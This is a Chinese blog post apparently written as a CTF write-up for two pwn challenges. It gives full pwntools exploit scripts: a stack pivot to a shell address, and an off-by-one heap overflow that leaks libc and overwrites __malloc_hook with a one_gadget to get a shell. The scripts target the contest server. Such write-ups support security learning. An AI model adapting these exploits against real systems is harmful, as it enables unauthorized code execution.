196082's blog
长安“战疫”网络安全卫士守护赛wp
196082 慢慢好起来
  2022-01-08 21:19:36   2022-01-08 21:26:11    727 字  3 分钟  

总的来说比赛挺简单的,因为pwn2没遇到过所以调试花费的时间比较多,没来的及做pwn3,不过pwn3看了好像是存在任意地址写漏洞,猜测是修改exit的got表之类的,后面复现了再发(当然有可能因为太懒不发了)。

pwn1

1
2
3
4
5
6
add esp, 10h
mov eax, 0
mov ecx, [ebp+var_4]
leave
lea esp,[ecx-4]
retn

注意程序不是从原本的位置开始ret就好了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
from pwn import *

elf = ELF('./pwn1')
# r = process('./pwn1')
r = remote('113.201.14.253', 16088)

shell_addr = 0x8048540

r.recvuntil(b'Gift:')
buf_addr = int(r.recvuntil(b'\n', drop=True)[2:], 16)

payload = b'a'*(0x38-0x4)+p32(buf_addr+0x38+8)+p32(0)+p32(shell_addr)
# r.sendline(b'a'*(0x38+0x4))
r.sendline(payload)

r.interactive()

pwn2

off by one

程序在create的时候存在off by one漏洞,具体思路,覆盖下方chunk,释放chunk进入unsortedbin泄漏main_arena,释放chunk进入tcache修改到malloc上面的地址

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
from pwn import *

elf = ELF('./pwn2')
libc = ELF('./libc-2.27.so')
# r = process('./pwn2')
r = remote('113.201.14.253', 16066)

context.log_level = 'debug'
one_gadget = 0x10a41c


def create(size, content):
    r.recvuntil(b'Choice: ')
    r.sendline(b'1')
    r.recvuntil(b'size: ')
    r.sendline(bytes(str(size), encoding='utf-8'))
    r.recvuntil(b'content: ')
    r.sendline(content)


def edit(id, content):
    r.recvuntil(b'Choice: ')
    r.sendline(b'2')
    r.recvuntil(b'idx: ')
    r.sendline(bytes(str(id), encoding='utf-8'))
    r.recvuntil(b'content: ')
    r.sendline(content)


def delete(id):
    r.recvuntil(b'Choice: ')
    r.sendline(b'3')
    r.recvuntil(b'idx: ')
    r.sendline(bytes(str(id), encoding='utf-8'))


def show(id):
    r.recvuntil(b'Choice: ')
    r.sendline(b'4')
    r.recvuntil(b'idx: ')
    r.sendline(bytes(str(id), encoding='utf-8'))


# gdb.attach(r)

create(0x68, b'a'*0x68)    # 0
create(0x100, b'a'*0x100)  # 1
create(0x68, b'a'*0x68)    # 2
create(0x88, b'a'*0x88)    # 3
create(0xf8, b'a'*0xf8)    # 4
create(0x88, b'a'*0x88)    # 5

# delete(9)
delete(0)
create(0x68, b'a'*(0x68-0x8)+p64(0)+b'\x80')  # 0
# 让chunk1覆盖掉chunk2
delete(1)

create(0x170, b'a')  # 1

delete(3)
create(0x88, b'a'*(0x88-0x8)+p64(0)+b'\x90')  # 3
delete(4)
# chunk4覆盖掉chunk5
create(0x180, b'a')  # 4

for i in range(7):
    create(0x88, b'a')
for i in range(7):
    delete(12-i)
delete(5)
# 让chunk5进入unsortedbin获得main_arena地址
edit(4, b'a'*(0xf8+0x8-1))
show(4)

r.recvuntil(b'aaaaaaaaaaaaaa\n')
main_arena_88 = u64(r.recvuntil(b'1.Add', drop=True).ljust(8, b'\x00'))
print(hex(main_arena_88))
malloc_hook = (main_arena_88 & 0xFFFFFFFFFFFFF000) + \
    (libc.symbols['__malloc_hook'] & 0xfff)
print(hex(malloc_hook))
libc_base = malloc_hook-libc.symbols['__malloc_hook']
one_gadget = libc_base+one_gadget

delete(2)
edit(1, b'a'*(0x100)+p64(0)+p64(0x70)+p64(malloc_hook-0x10))  # 2
# 释放chunk2,进入tcache,修改fd指针
create(0x68, b'a')
# gdb.attach(r)
create(0x68, b'a'*0x10+p64(one_gadget))
# 修改malloc_hook

r.recvuntil(b'Choice: ')
r.sendline(b'1')
r.recvuntil(b'size: ')
r.sendline(b'1')
# getshell

r.interactive()

自己还是在常见的漏洞上面出现问题比如这次的off by one还有off by null都还没去了解,所以下来会去了解这方面的漏洞原理和利用方式。

 评论
评论插件加载失败
正在加载评论插件
  1. pwn1
  2. pwn2
    1. off by one
© 2020 - 2025    196082
由 Hexo 驱动 & 主题 Keep
本站由 提供部署服务
总字数 335.6k 访客数 访问量
  1. pwn1
  2. pwn2
    1. off by one